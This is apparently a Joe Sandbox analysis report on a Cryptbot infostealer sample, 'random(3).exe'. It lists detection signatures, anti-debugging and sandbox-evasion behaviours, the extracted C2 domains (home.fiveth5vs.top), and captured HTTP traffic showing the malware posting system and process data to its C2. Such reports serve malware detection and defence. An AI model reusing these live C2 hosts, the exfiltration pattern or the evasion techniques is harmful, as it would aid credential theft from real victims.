Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
random(3).exe

Overview

General Information

Sample name:random(3).exe
Analysis ID:1583233
MD5:c2968f40e6c44036e1d3e18bca61c67d
SHA1:c5ece5cbb5181b1fad9eb16890d0929e0ed18b52
SHA256:90fd34b5d70fb45f79ebf8d13fedc6e78fa059054fe37bb963f1dd40b803fe93
Tags:exelev-tolstoi-comuser-JAMESWT_MHT
Infos:

Detection

Cryptbot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Cryptbot
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to create an SMB header
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • random(3).exe (PID: 7608 cmdline: "C:\Users\user\Desktop\random(3).exe" MD5: C2968F40E6C44036E1D3E18BCA61C67D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CryptBotA typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot

Malware Configuration

Threatname: Cryptbot

{"C2 list": [".1.1home.fiveth5vs.top", "home.fiveth5vs.top", "KvgPhome.fiveth5vs.top"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: random(3).exe PID: 7608JoeSecurity_Cryptbot_1Yara detected CryptbotJoe Security

    Sigma Signatures

    No Sigma rule has matched

    Suricata Signatures

    No Suricata rule has matched

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Antivirus / Scanner detection for submitted sample
    Source: random(3).exeAvira: detected
    Antivirus detection for URL or domain
    Source: http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737?argument=00103Avira URL Cloud: Label: malware
    Source: KvgPhome.fiveth5vs.topAvira URL Cloud: Label: malware
    Source: http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk17Avira URL Cloud: Label: malware
    Source: http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737?argument=0Avira URL Cloud: Label: malware
    Source: .1.1home.fiveth5vs.topAvira URL Cloud: Label: malware
    Source: home.fiveth5vs.topAvira URL Cloud: Label: malware
    Source: http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737http://home.fiveth5vs.top/KhxTILlSHLygUudVWlAvira URL Cloud: Label: malware
    Source: http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk173553773735a1Avira URL Cloud: Label: malware
    Source: http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737Avira URL Cloud: Label: malware
    Found malware configuration
    Source: random(3).exe.7608.3.memstrminMalware Configuration Extractor: Cryptbot {"C2 list": [".1.1home.fiveth5vs.top", "home.fiveth5vs.top", "KvgPhome.fiveth5vs.top"]}
    Multi AV Scanner detection for submitted file
    Source: random(3).exeVirustotal: Detection: 50%Perma Link
    Source: random(3).exeReversingLabs: Detection: 47%
    AI detected suspicious sample
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
    Machine Learning detection for sample
    Source: random(3).exeJoe Sandbox ML: detected
    Source: random(3).exeBinary or memory string: -----BEGIN PUBLIC KEY-----
    Source: C:\Users\user\Desktop\random(3).exeCode function: mov dword ptr [ebp+04h], 424D53FFh3_2_00CBA5B0
    Source: C:\Users\user\Desktop\random(3).exeCode function: mov dword ptr [ebx+04h], 424D53FFh3_2_00CBA7F0
    Source: C:\Users\user\Desktop\random(3).exeCode function: mov dword ptr [edi+04h], 424D53FFh3_2_00CBA7F0
    Source: C:\Users\user\Desktop\random(3).exeCode function: mov dword ptr [esi+04h], 424D53FFh3_2_00CBA7F0
    Source: C:\Users\user\Desktop\random(3).exeCode function: mov dword ptr [edi+04h], 424D53FFh3_2_00CBA7F0
    Source: C:\Users\user\Desktop\random(3).exeCode function: mov dword ptr [esi+04h], 424D53FFh3_2_00CBA7F0
    Source: C:\Users\user\Desktop\random(3).exeCode function: mov dword ptr [ebx+04h], 424D53FFh3_2_00CBA7F0
    Source: C:\Users\user\Desktop\random(3).exeCode function: mov dword ptr [ebx+04h], 424D53FFh3_2_00CBB560
    Source: random(3).exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
    Source: C:\Users\user\Desktop\random(3).exeCode function: 3_2_00C5255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,3_2_00C5255D
    Source: C:\Users\user\Desktop\random(3).exeCode function: 3_2_00C529FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,3_2_00C529FF

    Networking

    barindex
    C2 URLs / IPs found in malware configuration
    Source: Malware configuration extractorURLs: .1.1home.fiveth5vs.top
    Source: Malware configuration extractorURLs: home.fiveth5vs.top
    Source: Malware configuration extractorURLs: KvgPhome.fiveth5vs.top
    Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
    Source: global trafficHTTP traffic detected: POST /KhxTILlSHLygUudVWlQk1735537737 HTTP/1.1Host: home.fiveth5vs.topAccept: */*Content-Type: application/jsonContent-Length: 559948Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 39 38 32 31 37 36 35 32 39 31 34 35 30 36 35 31 37 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 34 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 30 34 20 7d 2c 2
    Source: global trafficHTTP traffic detected: GET /KhxTILlSHLygUudVWlQk1735537737?argument=0 HTTP/1.1Host: home.fiveth5vs.topAccept: */*
    Source: global trafficHTTP traffic detected: POST /KhxTILlSHLygUudVWlQk1735537737 HTTP/1.1Host: home.fiveth5vs.topAccept: */*Content-Type: application/jsonContent-Length: 31Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "0", "data": "Done1" }
    Source: Joe Sandbox ViewIP Address: 34.200.57.114 34.200.57.114
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: C:\Users\user\Desktop\random(3).exeCode function: 3_2_00D1A8C0 recvfrom,3_2_00D1A8C0
    Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
    Source: global trafficHTTP traffic detected: GET /KhxTILlSHLygUudVWlQk1735537737?argument=0 HTTP/1.1Host: home.fiveth5vs.topAccept: */*
    Source: global trafficDNS traffic detected: DNS query: httpbin.org
    Source: global trafficDNS traffic detected: DNS query: home.fiveth5vs.top
    Source: unknownHTTP traffic detected: POST /KhxTILlSHLygUudVWlQk1735537737 HTTP/1.1Host: home.fiveth5vs.topAccept: */*Content-Type: application/jsonContent-Length: 559948Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 39 38 32 31 37 36 35 32 39 31 34 35 30 36 35 31 37 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 34 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 30 34 20 7d 2c 2
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDserver: nginx/1.22.1date: Thu, 02 Jan 2025 08:15:26 GMTcontent-type: text/html; charset=utf-8content-length: 207Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDserver: nginx/1.22.1date: Thu, 02 Jan 2025 08:15:28 GMTcontent-type: text/html; charset=utf-8content-length: 207Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
    Source: random(3).exe, 00000003.00000003.1302485322.0000000007C77000.00000004.00001000.00020000.00000000.sdmp, random(3).exe, 00000003.00000002.1442412397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://.css
    Source: random(3).exe, 00000003.00000003.1302485322.0000000007C77000.00000004.00001000.00020000.00000000.sdmp, random(3).exe, 00000003.00000002.1442412397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://.jpg
    Source: random(3).exe, 00000003.00000002.1442412397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk17
    Source: random(3).exe, 00000003.00000003.1423794455.0000000002137000.00000004.00000020.00020000.00000000.sdmp, random(3).exe, 00000003.00000002.1443564848.0000000002139000.00000004.00000020.00020000.00000000.sdmp, random(3).exe, 00000003.00000003.1423751958.0000000002132000.00000004.00000020.00020000.00000000.sdmp, random(3).exe, 00000003.00000002.1442412397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737
    Source: random(3).exe, 00000003.00000003.1423751958.0000000002132000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk173553773735a1
    Source: random(3).exe, random(3).exe, 00000003.00000002.1443495653.000000000210E000.00000004.00000020.00020000.00000000.sdmp, random(3).exe, 00000003.00000003.1423247601.0000000002144000.00000004.00000020.00020000.00000000.sdmp, random(3).exe, 00000003.00000003.1422965909.0000000002143000.00000004.00000020.00020000.00000000.sdmp, random(3).exe, 00000003.00000002.1443595359.0000000002145000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737?argument=0
    Source: random(3).exe, 00000003.00000002.1443495653.000000000210E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737?argument=00103
    Source: random(3).exe, 00000003.00000002.1442412397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737http://home.fiveth5vs.top/KhxTILlSHLygUudVWl
    Source: random(3).exe, 00000003.00000003.1302485322.0000000007C77000.00000004.00001000.00020000.00000000.sdmp, random(3).exe, 00000003.00000002.1442412397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://html4/loose.dtd
    Source: random(3).exe, 00000003.00000002.1442412397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
    Source: random(3).exeString found in binary or memory: https://curl.se/docs/alt-svc.html#
    Source: random(3).exe, 00000003.00000002.1442412397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
    Source: random(3).exeString found in binary or memory: https://curl.se/docs/hsts.html#
    Source: random(3).exe, random(3).exe, 00000003.00000003.1302485322.0000000007C77000.00000004.00001000.00020000.00000000.sdmp, random(3).exe, 00000003.00000002.1442412397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
    Source: random(3).exe, 00000003.00000003.1302485322.0000000007C77000.00000004.00001000.00020000.00000000.sdmp, random(3).exe, 00000003.00000002.1442412397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://httpbin.org/ip
    Source: random(3).exe, 00000003.00000003.1302485322.0000000007C77000.00000004.00001000.00020000.00000000.sdmp, random(3).exe, 00000003.00000002.1442412397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://httpbin.org/ipbefore
    Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707

    System Summary

    barindex
    PE file contains section with special chars
    Source: random(3).exeStatic PE information: section name:
    Source: random(3).exeStatic PE information: section name: .idata
    Source: random(3).exeStatic PE information: section name:
    Source: C:\Users\user\Desktop\random(3).exeCode function: 3_3_02144B823_3_02144B82
    Source: C:\Users\user\Desktop\random(3).exeCode function: 3_3_02144B823_3_02144B82
    Source: C:\Users\user\Desktop\random(3).exeCode function: 3_3_0214495C3_3_0214495C
    Source: C:\Users\user\Desktop\random(3).exeCode function: 3_3_0214495C3_3_0214495C
    Source: C:\Users\user\Desktop\random(3).exeCode function: 3_3_02144B823_3_02144B82
    Source: C:\Users\user\Desktop\random(3).exeCode function: 3_3_02144B823_3_02144B82
    Source: C:\Users\user\Desktop\random(3).exeCode function: 3_3_0214495C3_3_0214495C
    Source: C:\Users\user\Desktop\random(3).exeCode function: 3_3_0214495C3_3_0214495C
    Source: C:\Users\user\Desktop\random(3).exeCode function: 3_2_00C605B03_2_00C605B0
    Source: C:\Users\user\Desktop\random(3).exeCode function: 3_2_00C66FA03_2_00C66FA0
    Source: C:\Users\user\Desktop\random(3).exeCode function: 3_2_00D1B1803_2_00D1B180
    Source: C:\Users\user\Desktop\random(3).exeCode function: 3_2_00C8F1003_2_00C8F100
    Source: C:\Users\user\Desktop\random(3).exeCode function: 3_2_00D200E03_2_00D200E0
    Source: C:\Users\user\Desktop\random(3).exeCode function: 3_2_00FDE0503_2_00FDE050
    Source: C:\Users\user\Desktop\random(3).exeCode function: 3_2_00FDA0003_2_00FDA000
    Source: C:\Users\user\Desktop\random(3).exeCode function: 3_2_00CB62103_2_00CB6210
    Source: C:\Users\user\Desktop\random(3).exeCode function: 3_2_00D1C3203_2_00D1C320
    Source: C:\Users\user\Desktop\random(3).exeCode function: 3_2_00FA44103_2_00FA4410
    Source: C:\Users\user\Desktop\random(3).exeCode function: 3_2_00D204203_2_00D20420
    Source: C:\Users\user\Desktop\random(3).exeCode function: 3_2_00C5E6203_2_00C5E620
    Source: C:\Users\user\Desktop\random(3).exeCode function: 3_2_00CBA7F03_2_00CBA7F0
    Source: C:\Users\user\Desktop\random(3).exeCode function: 3_2_00FD47803_2_00FD4780
    Source: C:\Users\user\Desktop\random(3).exeCode function: 3_2_00D1C7703_2_00D1C770
    Source: C:\Users\user\Desktop\random(3).exeCode function: 3_2_00FB67303_2_00FB6730
    Source: C:\Users\user\Desktop\random(3).exeCode function: 3_2_00C649403_2_00C64940
    Source: C:\Users\user\Desktop\random(3).exeCode function: 3_2_00C5A9603_2_00C5A960
    Source: C:\Users\user\Desktop\random(3).exeCode function: 3_2_00D0C9003_2_00D0C900
    Source: C:\Users\user\Desktop\random(3).exeCode function: 3_2_00E26AC03_2_00E26AC0
    Source: C:\Users\user\Desktop\random(3).exeCode function: 3_2_00F0AAC03_2_00F0AAC0
    Source: C:\Users\user\Desktop\random(3).exeCode function: 3_2_00FC8BF03_2_00FC8BF0
    Source: C:\Users\user\Desktop\random(3).exeCode function: 3_2_00C5CBB03_2_00C5CBB0
    Source: C:\Users\user\Desktop\random(3).exeCode function: 3_2_00DE4B603_2_00DE4B60
    Source: C:\Users\user\Desktop\random(3).exeCode function: 3_2_00F0AB2C3_2_00F0AB2C
    Source: C:\Users\user\Desktop\random(3).exeCode function: 3_2_00FDCC903_2_00FDCC90
    Source: C:\Users\user\Desktop\random(3).exeCode function: 3_2_00FCCD803_2_00FCCD80
    Source: C:\Users\user\Desktop\random(3).exeCode function: 3_2_00FD4D403_2_00FD4D40
    Source: C:\Users\user\Desktop\random(3).exeCode function: 3_2_00F6AE303_2_00F6AE30
    Source: C:\Users\user\Desktop\random(3).exeCode function: 3_2_00D1EF903_2_00D1EF90
    Source: C:\Users\user\Desktop\random(3).exeCode function: 3_2_00D18F903_2_00D18F90
    Source: C:\Users\user\Desktop\random(3).exeCode function: 3_2_00FA2F903_2_00FA2F90
    Source: C:\Users\user\Desktop\random(3).exeCode function: 3_2_00C74F703_2_00C74F70
    Source: C:\Users\user\Desktop\random(3).exeCode function: 3_2_00C610E63_2_00C610E6
    Source: C:\Users\user\Desktop\random(3).exeCode function: 3_2_00FBD4303_2_00FBD430
    Source: C:\Users\user\Desktop\random(3).exeCode function: 3_2_00FC35B03_2_00FC35B0
    Source: C:\Users\user\Desktop\random(3).exeCode function: 3_2_00FA56D03_2_00FA56D0
    Source: C:\Users\user\Desktop\random(3).exeCode function: 3_2_00FE17A03_2_00FE17A0
    Source: C:\Users\user\Desktop\random(3).exeCode function: 3_2_00D098803_2_00D09880
    Source: C:\Users\user\Desktop\random(3).exeCode function: 3_2_00FA99203_2_00FA9920
    Source: C:\Users\user\Desktop\random(3).exeCode function: 3_2_00FD3A703_2_00FD3A70
    Source: C:\Users\user\Desktop\random(3).exeCode function: 3_2_00C91BE03_2_00C91BE0
    Source: C:\Users\user\Desktop\random(3).exeCode function: 3_2_00FC1BD03_2_00FC1BD0
    Source: C:\Users\user\Desktop\random(3).exeCode function: String function: 00C575A0 appears 632 times
    Source: C:\Users\user\Desktop\random(3).exeCode function: String function: 00C95340 appears 45 times
    Source: C:\Users\user\Desktop\random(3).exeCode function: String function: 00C94F40 appears 306 times
    Source: C:\Users\user\Desktop\random(3).exeCode function: String function: 00C94FD0 appears 243 times
    Source: C:\Users\user\Desktop\random(3).exeCode function: String function: 00C5C960 appears 32 times
    Source: C:\Users\user\Desktop\random(3).exeCode function: String function: 00D344A0 appears 66 times
    Source: C:\Users\user\Desktop\random(3).exeCode function: String function: 00C6CCD0 appears 53 times
    Source: C:\Users\user\Desktop\random(3).exeCode function: String function: 00C573F0 appears 107 times
    Source: C:\Users\user\Desktop\random(3).exeCode function: String function: 00E07220 appears 91 times
    Source: C:\Users\user\Desktop\random(3).exeCode function: String function: 00C571E0 appears 44 times
    Source: C:\Users\user\Desktop\random(3).exeCode function: String function: 00C6CD40 appears 73 times
    Source: C:\Users\user\Desktop\random(3).exeCode function: String function: 00C950A0 appears 90 times
    Source: C:\Users\user\Desktop\random(3).exeCode function: String function: 00E2CBC0 appears 95 times
    Source: C:\Users\user\Desktop\random(3).exeCode function: String function: 00C5CAA0 appears 62 times
    Source: random(3).exeStatic PE information: invalid certificate
